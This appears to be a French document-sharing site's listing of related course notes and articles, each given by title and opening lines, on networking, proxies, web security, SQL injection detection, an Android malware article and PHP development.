Réseau informatique TIC TC - IUT Montpellier Internet et le Web Ensemble d'ordinateurs reliés entre eux et échangeant des informations sous forme de données numériques But : Rendre disponible l information
Plus en détailServices sur réseaux. Trois services à la loupe. Dominique PRESENT Dépt S.R.C. - I.U.T. de Marne la Vallée
Trois services à la loupe Services sur réseaux Dominique PRESENT Dépt S.R.C. - I.U.T. de Marne la Vallée Plan du cours : 1. Services de messagerie Architecture Fonctionnement Configuration/paramétrage
Plus en détailSQUID P r o x y L i b r e p o u r U n i x e t L i n u x
SQUID P r o x y L i b r e p o u r U n i x e t L i n u x 1. P r é s e n t a t i o n : SQUID est un proxy (serveur mandataire en français) cache sous linux. De ce fait il permet de partager un accès Internet
Plus en détailLes risques HERVE SCHAUER HSC
HERVE SCHAUER HSC Les risques Les risques ne cessent d'augmenter: Informatisation systématique de l'ensemble de la société Ouverture des systèmes d'information sur Internet Démultiplication de ce qui est
Plus en détailSQL Parser XML Xquery : Approche de détection des injections SQL
SQL Parser XML Xquery : Approche de détection des injections SQL Ramahefy T.R. 1, Rakotomiraho S. 2, Rabeherimanana L. 3 Laboratoire de Recherche Systèmes Embarqués, Instrumentation et Modélisation des
Plus en détailRéseaux. 1 Généralités. E. Jeandel
1 Généralités Réseaux Couche Application E. Jeandel Couche application Dernière couche du modèle OSI et TCP/IP Échange de messages entre processus Protocole Un protocole de niveau application doit spécifier
Plus en détailFormation Website Watcher
Formation Website Watcher Page 1 Comprendre le fonctionnement du Web Glossaire Structure du Web et protocoles Langages webs et veille Page 2 Comprendre le fonctionnement du Web Glossaire Page 3 Nom de
Plus en détailBon ben voilà c est fait!
Bon ben voilà c est fait! Au programme : - Exploration de l arborescence et informations systèmes - Action sur les dossiers et fichiers - Gestion des autorisations - Conversion pdf en text - Connexion
Plus en détail«Obad.a» : le malware Android le plus perfectionné à ce jour
«Obad.a» : le malware Android le plus perfectionné à ce jour Table des matières I. Le sujet de l article... 2 II. Réflexion sur les nouvelles menaces technologiques d aujourd hui... 2 A. Android, victime
Plus en détailSupplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de
Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de la PCI (PCI DSS) Version : 1.2 Date : Octobre 2008
Plus en détail1. La plate-forme LAMP
Servi ces pour intranet et Internet Ubuntu Linux - Création et gestion d un réseau local d entreprise 1. La plate-forme LAMP Services pour intranet et Internet La fourniture d'un site pour le réseau ou
Plus en détail2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant. http://robert.cireddu.free.
2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES 2.2 Architecture fonctionnelle d un système communicant Page:1/11 http://robert.cireddu.free.fr/sin LES DÉFENSES Objectifs du COURS : Ce cours traitera essentiellement
Plus en détailPHP 5.4 Développez un site web dynamique et interactif
Editions ENI PHP 5.4 Développez un site web dynamique et interactif Collection Ressources Informatiques Table des matières Table des matières 1 Chapitre 1 Introduction 1. Objectif de l'ouvrage.............................................
Plus en détailImpression de sécurité?
Impression de sécurité? Matthieu Herrb Capitoul, le 1er avril 2010 Agenda 1 Introduction 2 Risque lié au logiciel d impression 3 Risques liés au réseau 4 Risques liés à l imprimante 5 Risques liés papier
Plus en détailFonctionnement et mise en place d un reverse proxy sécurisé avec Apache. Dimitri ségard 8 mai 2011
Fonctionnement et mise en place d un reverse proxy sécurisé avec Apache. Dimitri ségard 8 mai 2011 Sommaire 1 Un peu de théorie 3 1.1 Qu est-ce qu un reverse proxy?................. 3 1.1.1 Généralités........................
Plus en détailSécuriser les applications web de l entreprise
LABORATOIRE SECURITE Sécuriser les applications web de l entreprise Mise en place de ModSecurity pour Apache Julien SIMON - 61131 Sommaire Présentation de la situation actuelle...3 Qu est ce qu un WAF?...5
Plus en détailL envoi d un formulaire par courriel. Configuration requise... 236 Mail Texte... 237 Mail HTML... 242 Check-list... 248
L envoi d un formulaire par courriel Configuration requise... 236 Mail Texte... 237 Mail HTML... 242 Check-list... 248 Chapitre 9 L envoi d un formulaire par courriel L envoi par courriel d informations
Plus en détail18 TCP Les protocoles de domaines d applications
18 TCP Les protocoles de domaines d applications Objectifs 18.1 Introduction Connaître les différentes catégories d applications et de protocoles de domaines d applications. Connaître les principaux protocoles
Plus en détailLinux sécurité des réseaux
Linux sécurité des réseaux serveurs mandataires (proxy) fbongat@ipsl.jussieu.fr 2007-2008 Qu'est-ce qu'un proxy? = mandataire (traduction) Un proxy est un service mandataire pour une application donnée.
Plus en détailNFA016 : Introduction. Pour naviguer sur le Web, il faut : Naviguer: dialoguer avec un serveur web
NFA016 : Introduction O. Pons, S. Rosmorduc Conservatoire National des Arts & Métiers Pour naviguer sur le Web, il faut : 1. Une connexion au réseau Réseau Connexion physique (câbles,sans fils, ) à des
Plus en détailArchitectures en couches pour applications web Rappel : Architecture en couches
Rappel : Architecture en couches Une architecture en couches aide à gérer la complexité : 7 Application 6 Presentation 5 Session Application Les couches hautes dépendent des couches basses 4 Transport
Plus en détail